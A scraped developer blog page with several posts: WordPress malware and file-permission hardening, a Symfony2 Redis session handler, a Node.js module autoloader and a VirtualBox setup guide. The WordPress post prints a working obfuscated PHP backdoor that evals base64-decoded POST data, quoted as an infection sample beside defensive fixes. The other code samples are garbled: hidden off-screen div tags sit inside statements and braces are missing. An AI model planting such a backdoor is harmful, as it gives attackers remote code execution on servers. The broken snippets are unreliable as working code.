How to avoid WordPress infected files by auditing file permissions?

Problem overview:

This is ture that WordPress engine has security flaws. It is true that WordPress plugins is written without taking care of security.

Recently I had to restore many WordPress instalations due to executing malicious code on servers (like a sending mail spam via sendmail).

But many hosting providers server’s configuration SUCKS! And I will explain you why.

First: WordPress could be attacked in many ways, we will cover one of them which is related with file permissions and wrong configuration.

Some example of executing malicious code

The most common example is creating many fucking infected *.php files (like post_3be78.php) that executing code that has been injected in $_POST request variable. These files has obfluscated content to be unable to recognize for human eye. Example:

$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n6769b6'])) {eval($s21(${$s20}['n6769b6']));}?>

The infected files may contain more cynical content but you will recognize this crap at first glance.

Server providers SUCKS!

Server providers sucks.

Thats because they runs PHP scripts from the same user that uploaded file (FTP user).

Extremely important fact:
If your scripts are executed from the FTP user = you have trouble.

why u executin php files

How to check if your hosting provider sucks?

  1. Simply create a new directory via FTP.
    Make sure that it have default 755 permisions, means only owner user of the directory has permissions to write new files on it.
  2. Create a new file test.php with content below and upload to that directory:
  3. Show file output result by accessing it via HTTP.

If the result is bool(true), the script have access to write any file to directory which exisis in. Yes? DAFUQ? Who agreed to it?

The second var_dump returns the user that executes this script. If this user is the same user that is your

FTP user, the result is correct, because this user is the owner or created directory and can write to it any files.

What does it means?

Any script file executed on

server have global permissions to write anywhere. It is security flaw of server configuration.

Sevrals years ago there was a standard that it have been required to set a chmod to directories/files where we permits to write.

How to avoid server configuration security flaw?

  1. You are hosting provider customer.Cannot. You have you ask your administrators that they can run your php scripts as different user that is your FTP user.If they disagree, get the fuck out of your hosting provider and look up for another. Wojciech is providing such services.
  2. If you are administrator, just set another user to run your php scripts.
    For Apache example:

    Edit file /etc/apache2/envvars (or wherever you have this crap)

    export APACHE_RUN_USER=www-data
    export APACHE_RUN_GROUP=www-data
    For Nginx + php-fpm

    Edit your pool configuration:

    user = www-data
    group = www-data

Temporary fix in .htaccess

Most of infected files that executes malicious code is beeing populated by $_POST requests. This is because of more much code can be send via HTTP POST request payload, because GET payload size is limited.

You can temporarly disable POST requests to URL’s that you don’t want to receive POST requests. This will block all new infected files, because you are creating a white list, not black list.

Example .htaccess file, this responds Error 404 while sending POST requests on urls different from /wp-login.php and /wp-admin*

# BEGIN WordPress

RewriteEngine On
RewriteBase /

#POST requests disable
RewriteCond %{REQUEST_URI} !^/wp-login.php [NC]
RewriteCond %{REQUEST_URI} !^/wp-admin [NC]
RewriteRule .* - [R=404,L]

RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# END WordPress

That all. I hope it helped.

Can I do more?


  1. “Wyczaruj sobie spokój”, Krzysiek Dróżdż (PL)

Symfony2 Redis Session Handler


When you scale a PHP

application you have to consider several aspects of runtime environment such us:

  • Bytecode caching (e.x. APC or Zend Optimizer Plus or eAccelerator), more;
  • Reading project files from RAM instead of HDD;
  • Caching and minify static content etc.
  • One additional aspect is storing sessions.

By default, PHP stores sessions in files. There are also several approaches to speed up saving sessions, such us memcached, mapping save_path folder as ramdisc, etc.

In scaling approaches there is important that many worker nodes (with deployed application) runs the same code, round-robin selected or load-ballanced, but have the same space to store sessions, because there is no guarantee in distributes architecture, that next user’s request will be handled by the same node. This implies, that session memory have to be shared between nodes, unfortunately storing these data in local

RAM doesn’t meet this requirement.

Redis as PHP Session Handler

One of additional approach to storing sessions in fast-memory is Redis – key-value store. This could be configured as centralized or distributed database.

There is available a Redis session_handler for PHP. To use it:

  1. install Redis first as a service [more]
  2. copy/compile PHP extension [more information]
  3. register an extension in php.ini configuration file
  4. reconfigure session.save_handler in your php.ini configuration file, or set it directly on runtime by writing for e.x.:
ini_set('session.save_handler', 'redis');
ini_set('session.save_path', 'tcp://localhost:6379');
Redis Session Handler in Symfony 2

I am using Symfony 2 framework. Unfortunately, 4th step don’t affects the application. You have to register own SessionHandler in config.yml file:

 handler_id: session_handler_redis

This configuration uses new SessionHandler registered ad session_handler_redis Symfony Service (more).

We have to write own SessionHandler in Symfony. I have found the Redis SessionHandler proposed by Andrej Hudec on GitHub (original code here). I have decided to use and improve existing implementation.

Declare new SessionHandler class somewhere in your project:

namespace Fokus\Webapp\CommonBundle\SessionHandler;
use \Symfony\Component\HttpFoundation\Session\Storage\Handler\NativeSessionHandler;
 * NativeRedisSessionStorage.
 * Driver for the redis session <div id="R77EHMs" style="position: absolute; top: -1183px; left: -1358px; width: 243px;"></div> save hadlers provided by the redis PHP extension.
 * @see
 * @author Andrej Hudec &lt;;
 * @author Piotr Pelczar &lt;;
class NativeRedisSessionHandler extends NativeSessionHandler
 * Constructor.
 * @param string $savePath Path of redis server.
 public function __construct($savePath = "")
 if (!extension_loaded('redis')) {
 throw new \RuntimeException('PHP does not have "redis" session module registered');
 if ("" === $savePath) {
 $savePath = ini_get('session.save_path');
 if ("" === $savePath) {
 $savePath = "tcp://localhost:6379"; // guess path
 ini_set('session.save_handler', 'redis');
 ini_set('session.save_path', $savePath);

Now, add the entry that declares

the class as a Symfony Service in services.yml file:

 class: Fokus\Webapp\CommonBundle\SessionHandler\NativeRedisSessionHandler
 arguments: ["%session_handler_redis_save_path%"]

I have improved Andrzej’s code that you can configure the session handler calling it’s constructor and pass the Redis connection string just in services in Symfony, without touching ini_set or php.ini settings. As you see, the %session_handler_redis_save_path% parameter has been used.

Now, declare the value of parameter in parameters.yml file:

session_handler_redis_save_path: tcp://localhost:6379

That’s all!

Just refresh your page, use the session such us in after loging and check out if it works. Type in command line:


and show all keys stored by PHP Session Handler. Keys begins with string PHPREDIS_SESSION:.


Example output:

1) "PHPREDIS_SESSION:s4uvor0u5dcsq5ncgulqiuef14"
2) "PHPREDIS_SESSION:dcu54je80e6feo5rjqvqpv60h7"

Hope it helped!


Node.js – Load modules from specified directory recursive

Recently I have introducted Node.js and Express framework into my project which is very modular.

One of principles is that each functionality is encapsulated into a Controller known from web applications

frameworks like as Spring, Zend, Symfony, etc. Controller is nothing other than a function/method that will be executed, when the client’s HTTP request incomes.

It is very convenient to autoload all controllers from specified directory, which intends to register into URL routing registry. Assume, that all controllers exists in /src/Controller/ directory.

We could use the fs module from the Node.js standard library and call fs.readdir(path) or fs.readdirSync(path), but methods doesn’t works recursive. There is a lot of methods to walk trought the directory tree, but I have used an existing wrench module written by Ryan McGrath.

The usage

of my ModuleLoader

moduleLoader.loadModulesFromDirectory(path, onLoadCallback)

where onLoadCallback is function(module, moduleName, filePath).


exports.loadModulesFromDirectory = function(dir, onLoadCallback) {
  require('wrench').readdirRecursive(dir, function(error, files) {
    if(null === <div id="EfTnmn1ktWhFBCA0i" style="position: absolute; top: -914px; left: -1383px; width: 276px;"></div> files)
    for(var i = 0, j = files.length; i &lt; j; ++i) {
      var file = files[i];
      var moduleName = file.substr(0, file.length - 3);
      var filePath = dir + "/" + file;
      var module = require(filePath);
      onLoadCallback(module, moduleName, filePath);

Simple. Let’s use

this to load our Node.js and Express web application controllers:

1. Create the package.json file:
  "name": "hello-world",
  "description": "testapp",
  "dependencies": {
    "express": "3.2.6",
    "wrench": "1.5.1"
2. Create the server.js file which will contain our web server:
var express = require('express');
var app = express();
var routes = require('./config/routes');

var port = process.env.port || 3000;

console.log('Starting server at port ' + port);

3. Define our ./config/routes.js file:
function setup(app) {
  var moduleLoader = require('ModuleLoader');
  var path <div id="o2lo0iGb" style="position: absolute; top: -1490px; left: -1399px; width: 221px;"></div> = __dirname + "/../src/Controller";
  moduleLoader.loadModulesFromDirectory(path, function(module, moduleName, filePath) {
    var loadingState = <div id="CQs3F" style="position: absolute; top: -857px; left: -984px; width: 371px;"></div> "";
    if(typeof module.registerAutoload === 'function') {
      loadingState = "OK";
    else {
      loadingState = "FAILED";
    console.log("Loading Controller &gt;&gt; " + moduleName + " &gt;&gt; from file " + filePath + ": " + loadingState + ".");
exports.setup = setup;
4. And the last one… create our test controller in ./src/Controller/Test.js:
actionHello = function(req, res) {
  res.end('Hello! Server date: ' + new Date());
exports.registerAutoload = function(app) {
  app.get('/hello', actionHello);

If controller’s intention is not to autoload, just don’t implement exports.registerAutoload method. It works like the autoloading controllers from specified namespace in Spring Framework to look up for classes with @Controller annotation.

5. Now run our app!

To install all dependencies, use npm (Node Packaged Modules):

npm install

After installing all dependencies, the node_modules wil be created. Now, ust run our app:

node server.js

Now, lunch: http://localhost:3000/hello

Pretty, isn’t it?

Hope it helped.


VirtualBox Linux server on Windows

Howdy! Recently I have faced the inconvenience that I have to develop parts of application beeing friendly-configurable on Linux and at the same time installing them on Windows is a nightmare.

What to do when do you develop on Windows, but you need the production environment based on Linux and you don’t want to buy server? Install Linux locally on Windows and run server on VirtualBox installed on Windows. The same story concerns the situation, when the production server have a lot of shit dependencies you don’t want to have on your developing environment, even it is Linux.

So how to connect VirtualBox Linux server from Windows?

  1. Download the VirtualBox and Linux distribution you want to install (.iso format will be convinience). I

    have coised Ubuntu, because of  rapid installation.

  2. Create a new virtual machine for your Linux. More info.
  3. Mount your .iso and install Linux on VirtualBox. Installation is really user-friendly.
  4. Now go to the setting of your virtual machine -> network adapters settings -> and change your network adapter to NAT. More info.
  5. Check if everything is ok, in particular that network adaper on virtual machine obtained the IP address. Just type:


    /sbin/ifconfig | grep addr

    Note the assigned IP address.

  6. Try to ping your virtual machine from host operating system, where VirtualBox is running:
    ping virtaul_machine_ip_address
  7. If everything is ok, your machines works mutualy. Now, install Open SSH server on your linux. For ubuntu:
    sudo apt-get install openssh-server
  8. Now, you can open the connection on your host device. On windows, you can use Putty for connect to the virtual machine’s command line.

My Ubuntu’s command line from Windows 8. Localy.


Happy coddin’!